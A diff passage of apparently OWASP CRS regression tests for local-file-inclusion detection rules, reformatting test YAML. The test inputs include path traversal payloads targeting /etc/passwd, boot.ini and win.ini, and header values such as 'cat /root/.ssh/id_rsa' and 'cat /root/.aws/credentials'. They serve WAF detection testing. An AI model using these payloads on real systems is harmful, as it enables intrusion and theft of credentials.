User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?foo=.../.../WINDOWS/win.ini" - version: "HTTP/1.1" - output: - log_contains: id "930100" - - test_title: 930100-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?foo=.../.../WINDOWS/win.ini" + version: "HTTP/1.1" + output: + log: + expect_ids: [930100] + - test_id: 3 desc: "Path Traversal Attack Triple Dot (/.../) encoded: foo=.../.../WINDOWS/win.ini" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?foo=0x2e.%000x2f0x2e.%00/WINDOWS/win.ini" - version: "HTTP/1.1" - output: - log_contains: id "930100" - - test_title: 930100-4 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?foo=0x2e.%000x2f0x2e.%00/WINDOWS/win.ini" + version: "HTTP/1.1" + output: + log: + expect_ids: [930100] + - test_id: 4 desc: "Status Page Test - Path Traversal Attack (../), partially encoded" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - FoobarHeader: "0x5c0x2e./" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930100" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + FoobarHeader: "0x5c0x2e./" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [930100] diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml index 2a0e587e7..65f94b99a 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml @@ -1,219 +1,220 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" - enabled: true - name: "930110.yaml" description: "Application attacks: Local file include" +rule_id: 930110 tests: - - test_title: 930110-1 + - test_id: 1 desc: "Path Traversal Attack (/../)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - FoobarHeader: "/../../../././..\\ ../../etc/master.passwd" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + FoobarHeader: "/../../../././..\\ ../../etc/master.passwd" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [930110] + - test_id: 2 desc: "Path Traversal Attack (/../) query string" stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - X-FTW: "This should trip" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?arg=../../../etc/passwd" - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-3 + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + X-FTW: "This should trip" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?arg=../../../etc/passwd" + version: "HTTP/1.1" + output: + log: + expect_ids: [930110] + - test_id: 3 desc: "Path Traversal Attack (/../) query string" stages: - - stage: - input: - dest_addr: "localhost" - method: "POST" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "arg=../../../etc/passwd&foo=var" - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-4 + - input: + dest_addr: "localhost" + method: "POST" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "arg=../../../etc/passwd&foo=var" + version: "HTTP/1.1" + output: + log: + expect_ids: [930110] + - test_id: 4 desc: "Path Traversal Attack (/../) query string" stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/foo../1234" - version: "HTTP/1.1" - output: - no_log_contains: id "930110" - - test_title: 930110-5 + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/foo../1234" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [930110] + - test_id: 5 desc: "Path Traversal Attack (/../) query string" stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/foo.../1234" - version: "HTTP/1.1" - output: - no_log_contains: id "930110" - - test_title: 930110-6 + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/foo.../1234" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [930110] + - test_id: 6 desc: "Path Traversal Attack (/../) query string" stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/..foo" - version: "HTTP/1.1" - output: - no_log_contains: id "930110" - - test_title: 930110-7 - desc: "Path Traversal Attack (/../) query string" + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/..foo" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [930110] + - test_id: 7 + desc: | + Path Traversal Attack (/../) query string. + Note: apparently, httpd strips dots, ModSecurity never sees them in `REQUEST_URI`` stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/.." - version: "HTTP/1.1" - output: - no_log_contains: id "930110" - - test_title: 930110-8 + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/.." + version: "HTTP/1.1" + output: + log: + no_expect_ids: [930110] + - test_id: 8 desc: 'Path Traversal Attack (..\) query string' stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: '/get?arg=..\pineapple' - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-9 + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: '/get?arg=..\pineapple' + version: "HTTP/1.1" + output: + log: + expect_ids: [930110] + - test_id: 9 desc: 'Path Traversal Attack triple dot (.../) query string' stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: '/get?foo=.../.../WINDOWS/win.ini' - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-10 + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: '/get?foo=.../.../WINDOWS/win.ini' + version: "HTTP/1.1" + output: + log: + expect_ids: [930110] + - test_id: 10 desc: 'Path Traversal Attack (../) file upload' stages: - - stage: - input: - dest_addr: "localhost" - method: "POST" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - uri: "/post" - data: | - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ - Content-Disposition: form-data; name="file"; filename="../1.7z" - Content-Type: application/octet-stream + - input: + dest_addr: "localhost" + method: "POST" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + uri: "/post" + data: | + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ + Content-Disposition: form-data; name="file"; filename="../1.7z" + Content-Type: application/octet-stream - BINARYDATA - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-11 + BINARYDATA + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- + version: "HTTP/1.1" + output: + log: + expect_ids: [930110] + - test_id: 11 desc: 'Path Traversal Attack (..\) file upload' stages: - - stage: - input: - dest_addr: "localhost" - method: "POST" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - uri: "/post" - data: | - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ - Content-Disposition: form-data; name="file"; filename="..\1.7z" - Content-Type: application/octet-stream + - input: + dest_addr: "localhost" + method: "POST" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + uri: "/post" + data: | + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ + Content-Disposition: form-data; name="file"; filename="..\1.7z" + Content-Type: application/octet-stream - BINARYDATA - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-12 + BINARYDATA + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- + version: "HTTP/1.1" + output: + log: + expect_ids: [930110] + - test_id: 12 desc: "Path Traversal Attack (;..;) query string" stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - X-FTW: "This should trip" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?a=..;.\\.;\\." - version: "HTTP/1.1" - output: - log_contains: id "930110" + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + X-FTW: "This should trip" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?a=..;.\\.;\\." + version: "HTTP/1.1" + output: + log: + expect_ids: [930110] diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml index 3e99e2d10..46ab1697e 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml @@ -1,186 +1,184 @@ --- meta: author: "csanders-git, azurit" - description: None - enabled: true - name: 930120.yaml +rule_id: 930120 tests: - - test_title: 930120-1 + - test_id: 1 desc: Remote File Access Attempt (930120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/index.php?file=News&op=../../../../../boot.ini%00" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/index.php?file=News&op=../../../../../boot.ini%00" + version: "HTTP/1.1" + output: + log: + expect_ids: [930120] + - test_id: 2 desc: Remote File Access Attempt (930120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/index.php?file=News&op=/etc/passwd%00" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/index.php?file=News&op=/etc/passwd%00" + version: "HTTP/1.1" + output: + log: + expect_ids: [930120] + - test_id: 3 desc: Remote File Access Attempt (930120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/index.php?file=News&op=../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf%00" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/index.php?file=News&op=../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf%00" + version: "HTTP/1.1" + output: + log: + expect_ids: [930120] + - test_id: 4 desc: "OS File Access" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?foo=arg&path_comp=.ssh/id_rsa" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-5 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?foo=arg&path_comp=.ssh/id_rsa" + version: "HTTP/1.1" + output: + log: + expect_ids: [930120] + - test_id: 5 desc: "LFI via parameter name: /sys" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?/sys/class=test" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-6 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?/sys/class=test" + version: "HTTP/1.1" + output: + log: + expect_ids: [930120] + - test_id: 6 desc: "LFI via parameter value: /sys" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?test=/sys/class" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-7 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?test=/sys/class" + version: "HTTP/1.1" + output: + log: + expect_ids: [930120] + - test_id: 7 desc: "LFI via parameter value: /etc/subuid" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?code=cat+%2Fetc%2Fsubuid" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-8 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?code=cat+%2Fetc%2Fsubuid" + version: "HTTP/1.1" + output: + log: + expect_ids: [930120] + - test_id: 8 desc: "LFI via parameter value: /etc/subuid-" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?code=cat+%2Fetc%2Fsubuid-" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-9 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?code=cat+%2Fetc%2Fsubuid-" + version: "HTTP/1.1" + output: + log: + expect_ids: [930120] + - test_id: 9 desc: | YM9WT5NU Disallow writing files to /tmp/ stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?code=>/tmp/curl" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-10 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?code=>/tmp/curl" + version: "HTTP/1.1" + output: + log: + expect_ids: [930120] + - test_id: 10 desc: | YM9WT5NU False positive test stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?code=>/tmp" - version: "HTTP/1.1" - output: - no_log_contains: id "930120" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?code=>/tmp" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [930120] diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml index ca1a8aa9e..821b89275 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml @@ -1,216 +1,215 @@ --- meta: author: "Franziska Bühler, azurit" - enabled: true - name: 930121.yaml +rule_id: 930121 tests: - - test_title: 930121-1 + - test_id: 1 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "cat /root/.ssh/id_rsa" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "cat /root/.ssh/id_rsa" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [930121] + - test_id: 2 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "cat /etc/apache2/apache2/apache2.conf" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "cat /etc/apache2/apache2/apache2.conf" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [930121] + - test_id: 3 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "cat /proc/sys/kernel/randomize_va_space" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "cat /proc/sys/kernel/randomize_va_space" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [930121] + - test_id: 4 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "cat /proc/net/tcp" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "cat /proc/net/tcp" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [930121] + - test_id: 5 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "cat /root/.aws/credentials" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "cat /root/.aws/credentials" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [930121] + - test_id: 6 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "cat /root/.ssh/id_rsa" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 